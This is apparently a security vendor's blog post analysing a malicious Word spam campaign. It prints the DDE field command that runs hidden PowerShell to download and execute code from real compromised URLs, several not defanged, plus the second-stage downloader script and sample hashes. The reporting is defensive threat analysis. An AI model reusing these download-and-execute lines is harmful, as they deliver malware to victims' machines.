A New Attack Takes Advantage of an Exploit in Word

On October 10th, researchers at the Chinese firm Qihoo 360 published an article warning of a zero-day exploit (CVE-2017-11826) affecting Office and which was already actively being exploited by attackers.

In the last few hours, we have detected a spam campaign targeting companies and making use of this exploit. This is a very dangerous attack since commands can be executed in Word with no OLE objects or macros needed. All our clients are proactively protected and updating will not be necessary thanks to Adaptive Defense 360.

Behavior

The email comes with an attached document. When opening the Word document, the first thing we see is the following message:

If we click “Yes”, the following message appears:

Next, the following message appears:

The document (sample 0910541C2AC975A49A28D7A939E48CD3) contains two pages. The first is blank, the second contains just a short message in Russian: “Error! Section unspecified.”

If we right-click the text, we can see that there is an associated field code:

If we click “Edit field”, we find the command used to exploit the vulnerability and allow the code to execute:

DDE C:\\Windows\\System32\\cmd.exe “/k powershell -NoP -sta -NonI -w hidden $e=(New-Object System.Net.WebClient).DownloadString(‘hxxp://arkberg-design.fi/KJHDhbje71’);powershell -e $e “

 

Here is a screen shot of the process tree that is generated if the exploit is executed properly:

Exploit CVE-2017-11826 – Download and execution of malware from the Word document

Here are some of the files used in this campaign:

  • I_215854.doc
  • I_563435.doc
  • I_847923.doc
  • I_949842.doc
  • I_516947.doc
  • I_505075.doc
  • I_875517.doc
  • DC0005845.doc
  • DC000034.doc
  • DC000873.doc
  • I_958223.doc
  • I_224600.doc
  • I_510287.doc
  • I_959819.doc
  • I_615989.doc
  • I_839063.doc
  • I_141519.doc

Commands to be Executed

Depending on which simple is analyzed, we can see that the download URL changes, despite the command being essentially the same.

Sample 0910541C2AC975A49A28D7A939E48CD3

powershell  -NoP -sta -NonI -w hidden $e=(New-Object System.Net.WebClient).DownloadString(‘http://arkberg-design.fi/KJHDhbje71’)~powershell -e $e

Sample 19CD38411C58F5441969E039204C3007

powershell  -NoP -sta -NonI -w hidden $e=(New-Object System.Net.WebClient).DownloadString(‘http://ryanbaptistchurch.com/KJHDhbje71’)~powershell -e $e

Sample 96284109C58728ED0B7E4A1229825448

powershell  -NoP -sta -NonI -w hidden $e=(New-Object System.Net.WebClient).DownloadString(‘http://vithos.de/hjergf76’)~powershell -e $e

Sample 1CB9A32AF5B30AA26D6198C8B5C46168

powershell  -NoP -sta -NonI -w hidden $e=(New-Object System.Net.WebClient).DownloadString(‘http://alexandradickman.com/KJHDhbje71’)~powershell -e $e

The following powershell script is downloaded and executed:

$urls = “hxxp://shamanic-extracts.biz/eurgf837or”,”hxxp://centralbaptistchurchnj.org/eurgf837or”,””,”hxxp://conxibit.com/eurgf837or”

foreach($url in $urls){

Try

{

Write-Host $url

$fp = “$env:temp\rekakva32.exe”

Write-Host $fp

$wc = New-Object System.Net.WebClient

$wc.DownloadFile($url, $fp)

Start-Process $fp

break

}

Catch

{

Write-Host $_.Exception.Message

}

}

From this URL:

hxxp://shamanic-extracts.biz/eurgf837or

And a Trojan is downloaded (4F03E360BE488A3811D40C113292BC01).

MD5s from the Word document:

0910541C2AC975A49A28D7A939E48CD3
19CD38411C58F5441969E039204C3007
96284109C58728ED0B7E4A1229825448
1CB9A32AF5B30AA26D6198C8B5C46168

The post A New Attack Takes Advantage of an Exploit in Word appeared first on Panda Security Mediacenter.

Article Link: https://www.pandasecurity.com/mediacenter/pandalabs/word-exploit/